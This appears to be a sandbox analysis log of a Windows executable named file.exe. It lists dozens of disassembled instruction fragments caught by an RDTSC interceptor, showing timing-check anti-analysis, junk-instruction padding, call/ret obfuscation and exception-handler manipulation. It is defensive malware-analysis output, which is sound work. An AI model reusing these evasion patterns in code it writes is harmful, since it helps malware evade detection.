Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923422 second address: 9234A5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2D807904ACh 0x00000008 jne 00007F2D807904A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 jnc 00007F2D807904ACh 0x00000018 pop edi 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F2D807904A8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000015h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 pushad 0x00000035 call 00007F2D807904B9h 0x0000003a xor dword ptr [ebp+122D1DFAh], esi 0x00000040 pop esi 0x00000041 popad 0x00000042 push 00000000h 0x00000044 mov ebx, dword ptr [ebp+122D1E3Fh] 0x0000004a push 00000000h 0x0000004c sbb di, 8644h 0x00000051 push eax 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F2D807904B0h 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9234A5 second address: 9234AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 922534 second address: 92253E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2D807904A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92253E second address: 92254F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D810C1E5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9235F5 second address: 923605 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D807904ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92254F second address: 92256A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9245F6 second address: 924601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F2D807904A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 923605 second address: 9236AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jns 00007F2D810C1E84h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F2D810C1E58h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 stc 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov edi, dword ptr [ebp+122D38EBh] 0x00000044 mov eax, dword ptr [ebp+122D0929h] 0x0000004a pushad 0x0000004b jl 00007F2D810C1E59h 0x00000051 movzx edx, si 0x00000054 jg 00007F2D810C1E5Ch 0x0000005a popad 0x0000005b push FFFFFFFFh 0x0000005d add edi, dword ptr [ebp+122D20F2h] 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jno 00007F2D810C1E58h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92568D second address: 92572F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F2D807904BAh 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F2D807904A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F2D807904A8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F2D807904A8h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 0000001Bh 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 mov ebx, dword ptr [ebp+122D3907h] 0x00000069 xchg eax, esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F2D807904B1h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92478E second address: 924793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92572F second address: 92575B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2D807904B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 924793 second address: 9247A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F2D810C1E58h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 927430 second address: 927441 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2D807904A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 927441 second address: 927445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 927445 second address: 927453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2D807904ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92A2A0 second address: 92A2A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9284D6 second address: 9284DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B84E second address: 92B862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B862 second address: 92B8D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2D807904B9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007F2D807904ADh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop esi 0x00000019 nop 0x0000001a jmp 00007F2D807904B4h 0x0000001f push 00000000h 0x00000021 mov edi, 276F09DFh 0x00000026 push 00000000h 0x00000028 sub bx, 854Bh 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f jne 00007F2D807904ACh 0x00000035 push eax 0x00000036 push edx 0x00000037 jno 00007F2D807904A6h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 92B8D0 second address: 92B8DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 931EA6 second address: 931EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 932D37 second address: 932D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93499F second address: 9349A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9349A4 second address: 9349B7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2D810C1E5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007F2D810C1E56h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 935449 second address: 93544D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93AF49 second address: 93AF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93AF4F second address: 93AF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93AF53 second address: 93AF7D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F2D810C1E5Ah 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2D810C1E5Ch 0x00000019 jl 00007F2D810C1E56h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A5A6 second address: 93A5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A75D second address: 93A76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jnp 00007F2D810C1E5Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A76E second address: 93A78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B2h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A913 second address: 93A919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A919 second address: 93A91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A91D second address: 93A929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D810C1E56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A929 second address: 93A94B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2D807904B7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93A94B second address: 93A95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F2D810C1E56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D40E second address: 93D412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D412 second address: 93D421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2D810C1E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93D421 second address: 93D42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2D807904A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A69 second address: 940A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D810C1E5Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A7D second address: 940A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 940A8B second address: 940AE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jnl 00007F2D810C1E58h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2D810C1E5Bh 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push ecx 0x0000001d pushad 0x0000001e jmp 00007F2D810C1E60h 0x00000023 jmp 00007F2D810C1E5Ch 0x00000028 popad 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2D810C1E65h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94733B second address: 947341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FE4 second address: 945FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jno 00007F2D810C1E56h 0x0000000e popad 0x0000000f jl 00007F2D810C1E5Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 945FFB second address: 946009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946009 second address: 94600E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94600E second address: 94601F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2D807904ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94683E second address: 94685F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 ja 00007F2D810C1E7Dh 0x0000000e pushad 0x0000000f jmp 00007F2D810C1E60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946992 second address: 94699C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2D807904A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94699C second address: 9469B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9469B1 second address: 9469C9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2D807904AEh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnl 00007F2D807904A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F2D807904A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9469C9 second address: 9469CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FEE second address: 946FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2D807904A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 946FFD second address: 947003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947003 second address: 947007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94717A second address: 94717E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94717E second address: 947197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F2D807904AAh 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 947197 second address: 9471A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9471A3 second address: 9471B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2D807904B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9471B7 second address: 9471BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9471BB second address: 9471C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9152C9 second address: 915300 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F2D810C1E56h 0x00000009 jmp 00007F2D810C1E68h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007F2D810C1E5Ch 0x00000019 pop esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91576C second address: 915772 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915836 second address: 91584F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2D810C1E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007F2D810C1E56h 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91584F second address: 9158E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2D807904A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push esi 0x0000000f jmp 00007F2D807904B6h 0x00000014 pop esi 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F2D807904A8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 je 00007F2D807904BBh 0x00000036 jmp 00007F2D807904B5h 0x0000003b or dword ptr [ebp+122D270Ah], esi 0x00000041 call 00007F2D807904A9h 0x00000046 jmp 00007F2D807904B7h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F2D807904ABh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9158E7 second address: 9158FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915A25 second address: 915A47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2D807904B9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915A47 second address: 915A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915A4D second address: 915A7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 mov ecx, esi 0x0000000b nop 0x0000000c jbe 00007F2D807904B8h 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F2D807904A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915A7B second address: 915A7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915A7F second address: 915A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915B73 second address: 915B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915C43 second address: 915C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915DA3 second address: 915DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D810C1E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915DC1 second address: 915DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2D807904A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 915DCC second address: 915E38 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2D810C1E6Eh 0x00000008 jmp 00007F2D810C1E68h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F2D810C1E58h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F2D810C1E58h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov edx, dword ptr [ebp+122D36C0h] 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 91637E second address: 91639D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2D807904AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F2D807904A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9164EC second address: 916507 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2D810C1E58h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F2D810C1E5Ch 0x00000015 jo 00007F2D810C1E56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 916507 second address: 91651C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F2D807904A6h 0x00000015 rdtsc
